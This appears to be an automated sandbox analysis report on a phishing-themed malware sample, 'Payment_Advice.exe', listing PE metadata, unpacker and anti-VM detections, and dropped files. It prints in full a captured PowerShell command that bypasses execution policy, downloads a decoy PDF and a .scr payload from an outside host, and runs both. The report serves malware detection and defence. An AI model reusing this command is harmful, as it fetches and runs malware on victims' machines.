            Source: Payment_Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Payment_Advice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: Payment_Advice.exe, 00000000.00000002.1199149404.00000000057B0000.00000004.08000000.00040000.00000000.sdmp, Payment_Advice.exe, 00000000.00000002.1198385946.0000000003011000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000017.00000002.1414670213.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \/.dll.pdb source: Payment_Advice.exe, hadvices.scr.4.dr

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: Payment_Advice.exe, --j.cs.Net Code: LoadLocalizedGrammarFromType
            Source: Payment_Advice.exe, --j.cs.Net Code: LoadGrammarFromAssembly
            Source: Payment_Advice.exe, --.cs.Net Code: CheckAssembly System.Reflection.Assembly.Load(byte[])
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"Jump to behavior
            Source: Payment_Advice.exeStatic PE information: 0xDD330B0C [Thu Aug 7 15:51:40 2087 UTC]
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_0040A3D2 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,2_2_0040A3D2
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_00414426 push cs; iretd 2_2_004143FA
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_004145D6 push ebx; ret 2_2_004145D7
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_00414324 push cs; iretd 2_2_004143FA

            Persistence and Installation Behavior

            barindex
            Drops PE files with a suspicious file extension
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\hadvices.scrJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\hadvices.scrJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\hadvices.scrJump to dropped file
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Temp\hadvices.scrProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Payment_Advice.exe PID: 1228, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Payment_Advice.exeMemory allocated: 1450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeMemory allocated: 2F50000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 1550000 memory reserve | memory write watch
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 2DB0000 memory reserve | memory write watch
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 4DB0000 memory reserve | memory write watch
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 1770000 memory reserve | memory write watch
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 3130000 memory reserve | memory write watch
            Source: C:\Windows\Temp\hadvices.scrMemory allocated: 5130000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Payment_Advice.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 922337203685477
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 922337203685477
